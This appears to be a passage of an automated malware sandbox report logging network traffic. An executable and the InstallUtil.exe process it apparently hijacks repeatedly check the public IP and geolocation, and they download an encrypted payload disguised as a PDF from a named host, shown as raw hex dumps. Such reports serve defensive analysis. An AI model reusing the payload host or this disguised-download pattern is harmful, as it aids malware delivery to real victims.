                                                                    Date: Wed, 30 Oct 2024 00:42:25 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 106
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 1ce09f17664d23d5c41c37750ace8a43
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>
                                                                    Oct 30, 2024 01:42:26.434072018 CET127OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Oct 30, 2024 01:42:26.595895052 CET323INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:26 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 106
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 1030e06d48a7089626ff4c8c17c1852d
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.449757193.122.130.080600C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 01:42:27.387289047 CET127OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Oct 30, 2024 01:42:28.048476934 CET323INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:27 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 106
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 649c45e98f451eec2afd3e8b6c876a59
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    9192.168.2.449759193.122.130.080600C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 01:42:28.806972980 CET151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Oct 30, 2024 01:42:29.470882893 CET323INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:29 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 106
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 81a0b6f3b1419432fda36a26636a188a
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    10192.168.2.449761193.122.130.080600C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 01:42:30.251286030 CET151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Oct 30, 2024 01:42:30.925256014 CET323INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:30 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 106
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 9a01c416c62a2592703b2ec8ec31fbb6
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    11192.168.2.449763193.122.130.080600C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 01:42:31.735548973 CET151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Oct 30, 2024 01:42:32.388011932 CET323INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:32 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 106
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: a4d762d1c85bc392479e87c146919089
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    12192.168.2.449765193.122.130.080600C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 01:42:33.199286938 CET151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Oct 30, 2024 01:42:33.852431059 CET323INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:33 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 106
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: ab08faebdcb774ac9eddf07fa9fff2f0
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    13192.168.2.449767193.122.130.080600C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 01:42:34.611223936 CET151OUTGET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Oct 30, 2024 01:42:35.283556938 CET323INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:35 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 106
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 7bcb46bb2603a515ececdbd8837e6e85
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.72</body></html>


                                                                    HTTPS Proxied Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.449730190.107.177.804434544C:\Users\user\Desktop\Ndnownts.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-30 00:42:01 UTC80OUTGET /Yinmwpj.pdf HTTP/1.1
                                                                    Host: nexoproducciones.cl
                                                                    Connection: Keep-Alive
                                                                    2024-10-30 00:42:01 UTC317INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:01 GMT
                                                                    Server: Apache
                                                                    Last-Modified: Mon, 28 Oct 2024 12:32:17 GMT
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 951816
                                                                    Cache-Control: max-age=2592000, public
                                                                    Expires: Fri, 29 Nov 2024 00:42:01 GMT
                                                                    Vary: Accept-Encoding
                                                                    Connection: close
                                                                    Content-Type: application/pdf
                                                                    2024-10-30 00:42:01 UTC7875INData Raw: bb 18 15 e2 bb 99 db fa 71 5c 3f d3 91 41 44 1c 35 1c 6f a3 c5 27 10 a9 62 5f 8d ec a6 eb 6c ce aa 6c c3 f6 85 ea cb 98 c5 eb ea fd 72 17 ff 1c 17 c1 04 39 0a 11 08 e6 8d d7 b7 26 6e 0f ce fe 67 e0 35 65 42 04 36 0b 2e 9c 3d 56 12 04 d1 f3 ed 0d 5f 97 2e 45 fa e7 9b a5 31 89 ec 17 74 7c 12 96 e5 36 e7 c5 e2 93 8e 19 fa 8d 02 8f ba 91 01 71 ae e2 ce 40 e5 83 d6 6b 37 67 38 30 1a be 23 13 1b 80 c2 c8 4c f6 ac 4f 68 e8 33 87 70 02 00 aa b7 44 05 86 16 80 d7 b8 01 10 8a b9 a2 a2 dc d8 0b 7c 3d f1 b1 b0 5f af 51 0d e5 ff 47 03 81 9a 72 2e 77 93 7d 39 44 41 3d 3c ca 7f 05 15 bd 45 e3 4a e7 67 83 fb 1a 4f ec 3c c1 d1 ba 92 92 69 9b d1 6d 6d 30 a3 0a 08 53 aa 1e 7c 17 d8 2e 34 11 98 85 6f 55 5d bb ff 31 24 35 01 73 22 2a 6d f9 9f 8c f3 d1 f9 43 4e e7 6d b0 4b 18
                                                                    Data Ascii: q\?AD5o'b_llr9&ng5eB6.=V_.E1t|6q@k7g80#LOh3pD|=_QGr.w}9DA=<EJgO<imm0S|.4oU]1$5s"*mCNmK
                                                                    2024-10-30 00:42:01 UTC8000INData Raw: 2d 18 a3 40 e8 9b 33 59 f2 3c c0 a0 db 43 67 e3 e9 08 9e 17 61 17 fb c6 c6 eb 5a 5d a1 d8 94 2f 76 b6 72 1b c3 ce ca 51 9a 84 cd c3 ea 4f e8 16 d5 f8 1b 82 42 81 f0 61 20 48 f9 e3 ba b5 d2 fe 38 33 90 27 d6 5c c1 a5 ca df a7 d6 80 ec 55 be ab 1b 50 6c e4 d3 2c 65 30 7f ba 24 d2 7a 97 22 d4 bc 71 69 ca 82 66 9c f8 ae 03 6f c9 09 2b a6 bf af 14 ce 40 a8 57 3c a3 93 4a 83 c0 7a ce 5c 4b 9d bb 79 cb ec a8 a4 4d 56 7f b6 08 10 64 43 ac 51 ff f7 09 7b d7 59 ea 1e 03 86 be 54 80 bc 51 af 73 66 a8 4e d7 48 6b e4 a2 28 89 31 28 31 08 7f 2c c4 ee 1f 83 49 96 c5 f4 cb 01 43 ca 9e 6f a3 5a 2a d4 54 9c 76 3d 79 df e2 0e db 46 66 62 7e 4f 49 be 31 85 82 7a 06 ac 8b 35 ce c2 9e a0 fc e8 28 0c e0 c0 a7 5a 54 f5 d0 53 74 9d 68 45 9a ee ef 2f b0 7b b5 88 ba 0e 30 8c 6a 9a
                                                                    Data Ascii: -@3Y<CgaZ]/vrQOBa H83'\UPl,e0$z"qifo+@W<Jz\KyMVdCQ{YTQsfNHk(1(1,ICoZ*Tv=yFfb~OI1z5(ZTSthE/{0j
                                                                    2024-10-30 00:42:01 UTC8000INData Raw: e1 04 a8 b4 be 97 0b 95 03 d7 f7 fe ec 63 7b fb d7 ed cf ad 83 53 91 10 b1 95 72 d6 54 74 ea 5a 47 cd 10 0c 0f ea 0b 12 44 e5 dc eb 35 83 b7 2d fa f9 d0 17 4e dd 62 7c e1 ea 7c 49 dd f5 8f ca 39 23 4f c5 90 7b 14 d3 ae 12 77 29 de 45 7b c0 71 8b 40 1c e5 c7 a3 e7 ea 30 44 b2 aa 71 4b bf 85 da 80 ee 57 69 82 9c eb b6 6f dc 29 39 9d fb 6b b4 24 b7 fd 3b e9 df 50 79 39 7c 78 1b b0 e1 aa 1a 48 cd a3 ad 05 60 54 ab a2 16 9a 73 c7 3e e4 40 f5 de 33 ff 3e 83 6c da 71 fc 6b 88 d2 70 93 55 ce 3c 7a 89 84 11 2c e7 3c 0a 46 aa 2b e4 7a 2f fc b0 3d 95 54 25 33 75 17 16 78 0f 4e 8b 71 9f 08 6e ec c4 33 ed 17 e2 5d b6 97 ff c5 9b 48 53 d8 bc eb e1 31 88 b5 ef 31 e1 97 ef a1 34 e9 59 59 2f bd 86 97 a7 2c 90 c6 06 53 ae ff b2 0a 63 8c 78 77 74 d3 1c 01 98 35 c3 5a 6b 5e
                                                                    Data Ascii: c{SrTtZGD5-Nb||I9#O{w)E{q@0DqKWio)9k$;Py9|xH`Ts>@3>lqkpU<z,<F+z/=T%3uxNqn3]HS114YY/,Scxwt5Zk^
                                                                    2024-10-30 00:42:01 UTC8000INData Raw: 76 a3 f2 b7 c8 f9 58 89 37 00 97 b2 ed 7c 25 b6 44 55 c9 94 5f 59 7a eb 21 88 2f 89 5a 30 4d ec d1 6b ae 96 4f 44 e1 b1 50 3f 5e b8 98 1f 20 ee 92 6a 83 e3 4d 9a c2 18 9b 32 65 1f 80 33 26 bf 80 a8 4c 66 cf c4 6d 53 4d 29 5b a2 9f 57 82 a2 c2 f3 a6 fe d2 b8 fd a3 4a 8a 55 18 8c 4c d7 7b 77 08 d5 c4 e3 1f f5 66 a4 58 d1 23 c6 9b 98 5f 6d 92 60 e6 8b e6 ed fc 91 f9 17 2a 20 11 9e 7e 87 54 de 8d d5 b6 61 3a d7 ae c1 af 38 99 41 61 57 0d ac 9d 5d 5f 44 8f 49 80 83 4d d7 29 95 31 7c 29 9a bd f1 b1 17 ed 6a 4b 4b ff 82 54 6b 6a 0f 5c ab d1 41 1d ae 11 9a 27 93 23 40 3f a1 52 4b 8a 6c 8e f7 e6 db 6f a0 c9 ab 06 62 05 fc e5 09 4b d1 0a 12 fb 9e 44 89 45 f2 04 57 6f 16 9e 85 a1 a9 b2 c3 2b d7 c1 78 a9 51 b1 51 3f 2d ad 4a c6 42 70 26 42 1a 7e e7 9a 45 a8 c9 ae 84
                                                                    Data Ascii: vX7|%DU_Yz!/Z0MkODP?^ jM2e3&LfmSM)[WJUL{wfX#_m`* ~Ta:8AaW]_DIM)1|)jKKTkj\A'#@?RKlobKDEWo+xQQ?-JBp&B~E
                                                                    2024-10-30 00:42:01 UTC8000INData Raw: 2c 84 34 fd 1f 8c cd 32 f1 cc b7 a4 a2 1c d8 91 8f df fb 18 4e d5 cf ff 0d 96 a2 b4 7d af 4a 80 02 8e f9 2b 67 c8 b4 99 fc 13 b9 cc 1e 17 0b 80 79 3d fa 65 5e 63 d2 21 f4 f5 72 ad 54 c4 c3 ce 20 58 ad 47 35 93 d7 19 1d b3 7b 5d 32 8d 6a 64 82 59 07 82 d6 63 c1 7f 32 f8 57 f7 87 41 49 c2 8b c1 a2 96 78 05 7e a1 a0 f4 13 85 96 f4 ae 08 b2 b2 51 22 f8 d7 8c 34 b0 f4 50 73 93 7c b4 b8 61 9a bf 89 68 87 65 9b c3 d8 bc 20 ee 93 5a 39 c4 e2 78 85 a2 a8 dc cd b8 a1 93 02 01 66 40 d7 5a fe 91 21 7c f7 c6 e0 8a f7 42 26 5d 70 41 03 92 2b 05 ed 77 20 a4 0b fb 1f d0 00 b9 cf 69 72 07 88 3a 02 33 94 9d 5e 91 cc c0 14 d9 ee 07 98 ab d4 62 43 10 b4 b9 87 6d ea 1a 94 c2 fe 1f 80 2b 03 54 88 16 f6 8d a2 f8 1c 57 86 a8 10 34 0e 7a 6e f4 a3 37 ed 0b 1e 45 16 b3 91 a6 4e 99
                                                                    Data Ascii: ,42N}J+gy=e^c!rT XG5{]2jdYc2WAIx~Q"4Ps|ahe Z9xf@Z!|B&]pA+w ir:3^bCm+TW4zn7EN
                                                                    2024-10-30 00:42:01 UTC8000INData Raw: 17 f3 78 70 4b cf 21 80 cc db 3d e5 dd 37 50 ca e8 61 65 36 ae b7 81 3c cd 51 4d 2b 41 b5 b3 7d 18 c3 5e aa ec 84 5e e2 70 80 fa 85 0c 7f f0 e7 e0 eb 1c cd d8 55 53 0b b9 3f a7 cd 0d c2 e6 05 7a bd 27 6a f6 3e 62 12 74 7f f2 41 b5 52 30 e7 f6 57 fb d6 d3 e7 89 c0 ee 9b dd 04 f8 93 f5 c7 b9 b7 94 ee c2 c7 7a db 15 a2 83 cc 03 7b 22 1d 14 27 24 2b 62 10 ae c9 82 fb 2a 5b fb 22 87 1b 73 ec 2f 04 2b 22 96 03 63 e1 e5 39 13 07 38 a5 ab 4d fa 99 6d ed 9f f7 1b 84 fa 4d 90 e1 41 55 c6 61 54 c3 f5 04 6c 18 c8 26 5c d7 52 74 01 4f 86 54 df dd 60 56 ad 9a d1 a5 14 ba c5 33 85 cb 8c 21 d0 c6 a2 af cd c2 cc 6b 09 2f 67 7d e7 7c 67 7c bc be bc d4 92 17 28 93 87 f7 2e a1 92 00 51 39 53 89 cc 05 14 07 f9 53 42 43 40 e6 f9 c6 ac 5a 46 e2 1b 17 2d 73 10 7f 44 ea 28 db 23
                                                                    Data Ascii: xpK!=7Pae6<QM+A}^^pUS?z'j>btAR0Wz{"'$+b*["s/+"c98MmMAUaTl&\RtOT`V3!k/g}|g|(.Q9SSBC@ZF-sD(#
                                                                    2024-10-30 00:42:01 UTC8000INData Raw: 9e ee f7 75 95 83 82 2b 21 6f 74 4c 74 54 e1 e8 a5 38 89 99 d7 4f 87 9b c4 d0 c1 5c 84 42 f6 f3 66 e7 7e 8d 46 16 06 10 d2 5c 13 c0 39 f6 68 0a 4e 58 20 0d 7c 32 e8 8b 0e f0 d9 71 88 c6 7d c1 12 26 42 5c 96 5b 6b 4c 0d 3d c6 6d 61 6e f9 c9 7b 73 b8 f2 53 93 15 75 a6 06 c9 d7 38 49 29 33 67 8b 6e f1 52 72 b4 4c 05 b8 48 60 dd a1 7a 02 c8 3c eb ec d5 c4 89 b3 7b 51 38 6f de dd 12 39 b2 b7 74 98 32 15 23 e3 f7 4f ef b1 52 78 da ef 26 c5 5b 04 37 41 b4 30 fb 2b 9c ac df cb 55 5c 63 0d 34 bd 3a 5e 19 0a 28 20 52 46 a3 6f b0 63 e9 a7 ad b3 51 93 f3 98 ae 2d d6 ef 68 cc 20 ae ba 75 2d 89 2f 55 47 b7 e1 7e 83 70 96 6b c6 ae c0 76 7a 8a 0d d7 01 64 27 17 01 63 8f dc 3e 2a 72 df c4 8c e6 7d 2b 65 fb 76 34 5d 9e d4 db 0a 8d d3 a0 e3 dc 87 9a 12 d6 9e 41 c0 e7 bb 55
                                                                    Data Ascii: u+!otLtT8O\Bf~F\9hNX |2q}&B\[kL=man{sSu8I)3gnRrLH`z<{Q8o9t2#ORx&[7A0+U\c4:^( RFocQ-h u-/UG~pkvzd'c>*r}+ev4]AU
                                                                    2024-10-30 00:42:01 UTC8000INData Raw: d2 bf b1 39 2b 14 4f a9 2f a4 aa 89 fe ee 2b fa b3 50 a9 e3 e7 04 86 65 9f 52 ef 05 bc 47 66 9f b6 ef e4 7c 2f 5d 8b 4d b8 71 96 55 00 bd a2 9e 53 35 a2 15 33 12 86 d2 ad 67 d9 ea 54 3b 85 ec f9 90 26 da 66 4a ae c9 6a 08 9d 4b 80 c1 5c 96 f1 d0 fa ea 8e 66 15 d9 46 1b d5 0b 82 3d d5 b1 4a 5c 17 08 f2 67 09 d9 a8 16 25 b9 5a e8 e2 81 ed 26 97 df 51 e7 59 08 99 e9 95 c2 6f bf e8 7d 10 28 d5 be fe 0a 04 14 58 10 4c 15 27 35 70 55 e9 64 ac e4 72 7b a9 a3 1c 95 e6 46 89 7a 6f 63 11 68 25 7b b5 69 8a e5 f3 ca 5e 2f af 79 b7 41 1f e6 cf b4 66 bf 1f 25 77 de 47 e4 f3 98 27 b0 a9 44 f2 07 ea 0a 4b 79 b7 34 94 2e bc 2d 49 e0 d1 17 28 d7 c5 c8 6c 7c 76 d8 83 70 be 94 b8 3e b9 31 2c 5d 8c 13 55 70 05 ac e8 1f 58 03 44 7c a9 35 e3 9f 15 cc 13 9e c8 7d fa b5 f5 4a 49
                                                                    Data Ascii: 9+O/+PeRGf|/]MqUS53gT;&fJjK\fF=J\g%Z&QYo}(XL'5pUdr{Fzoch%{i^/yAf%wG'DKy4.-I(l|vp>1,]UpXD|5}JI
                                                                    2024-10-30 00:42:02 UTC8000INData Raw: 3d 4f 46 7e 43 70 a6 d7 95 85 82 93 46 99 db 02 82 63 4b b9 a0 f8 96 be 21 44 1b 1a 39 ab c1 c0 44 cc 8a 73 79 2b de c1 bb dc 5c d9 07 a3 fb 24 e5 13 8f a0 4d 69 67 67 e7 ba bc e6 c4 c0 5e 10 0b 80 20 6d cb 0f 50 8f 8f 0c d6 13 8c 68 d4 0a 4e ed ec 39 23 8f f4 58 32 77 77 6e 97 65 48 47 30 f4 fb 4b 90 25 29 2c 5d e4 42 2b 39 1d f1 51 bb 13 37 31 57 85 7f d9 14 c7 1e 47 20 1e 23 59 bc a8 94 43 b1 b9 91 9f 50 3f c1 00 aa 92 09 88 05 65 25 75 ba 7c c3 96 30 ac f3 c4 a4 0a af 30 af 22 ba 0d 7f 9e 10 d9 39 b4 b3 fc 4f d6 d0 4c 0f 7f f9 0a e6 2a 9d 4a ed 47 87 44 7e 7f 4e 0a 16 6b 3d 54 6b d4 8f 41 0a 0e 49 38 2a 78 15 5e 11 95 af d8 69 64 f3 50 f4 5b bb c0 bf 25 9f b4 26 74 72 cc d4 e0 18 1e 7f 9c c1 ba b8 ca 51 2c 2a 38 0e 42 32 e7 e4 94 14 99 6c 67 49 92 8f
                                                                    Data Ascii: =OF~CpFcK!D9Dsy+\$Migg^ mPhN9#X2wwneHG0K%),]B+9Q71WG #YCP?e%u|00"9OL*JGD~Nk=TkAI8*x^idP[%&trQ,*8B2lgI
                                                                    2024-10-30 00:42:02 UTC8000INData Raw: e4 d4 b5 f7 92 c1 b9 ff 53 bd 2b ec d3 9f cd 87 5d 14 2b ac 44 89 1c 01 7e 5f bb 62 32 6f b5 00 60 73 4e fd 8f 34 dc 67 c5 ff 98 15 82 d2 2f c5 d6 6d a7 bc 91 26 a2 56 72 18 26 0e ad a9 03 62 27 12 dc c2 55 38 76 06 c1 43 12 7c 8a a1 ac f3 39 f4 33 9e 0f a7 64 14 69 d2 a3 45 92 1f 85 58 22 95 57 a7 00 56 07 fa e9 74 71 cf b3 a6 d3 59 15 8f ea 19 07 43 27 13 57 25 bf 7a 7c 18 0e 30 a1 e7 30 2b c8 0c b9 33 61 9d 4f 8c c8 13 13 30 b7 ec b5 d5 ac 92 44 fe 12 d9 2a 69 13 02 af a4 b5 9c 77 9e 81 75 c1 63 c4 6e ea 19 55 bf 6d f2 22 d6 0f 75 d5 85 fa e8 b0 bc 1a 1e 41 5d b6 37 38 d5 74 47 dd 7c 6a 5a e6 ae 36 25 e4 c0 f3 05 2b 7f 2a 29 b6 54 af 8c d8 1c 3e 1f 88 62 3d 85 dc 39 00 85 0f aa 33 72 08 aa 24 28 9b 6d 86 2b 9c 67 70 b5 c3 de 5f 5d bc 44 f9 e6 bd ed 61
                                                                    Data Ascii: S+]+D~_b2o`sN4g/m&Vr&b'U8vC|93diEX"WVtqYC'W%z|00+3aO0D*iwucnUm"uA]78tG|jZ6%+*)T>b=93r$(m+gp_]Da


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.449732188.114.97.34435544C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-30 00:42:08 UTC87OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    Connection: Keep-Alive
                                                                    2024-10-30 00:42:08 UTC883INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:08 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 359
                                                                    Connection: close
                                                                    apigw-requestid: AZ6gpggEPHcESXQ=
                                                                    Cache-Control: max-age=31536000
                                                                    CF-Cache-Status: HIT
                                                                    Age: 56438
                                                                    Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT
                                                                    Accept-Ranges: bytes
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lj3ERfoFiYTv1pTYFSCZ2Cc%2Fmp2UVc2BZEjajAIK6VCMuMajdhgKfQrsPHt8XSMNvDbCxR6XfZKLtazT%2Bjl78jRHAVbX2InQ5dnec79vF9DMPDUgJ35NWzW54pXJVifJI9RoE2AZ"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8da75d191eae0c46-DFW
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2442&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1855221&cwnd=251&unsent_bytes=0&cid=87fe32ccc685a07c&ts=209&x=0"
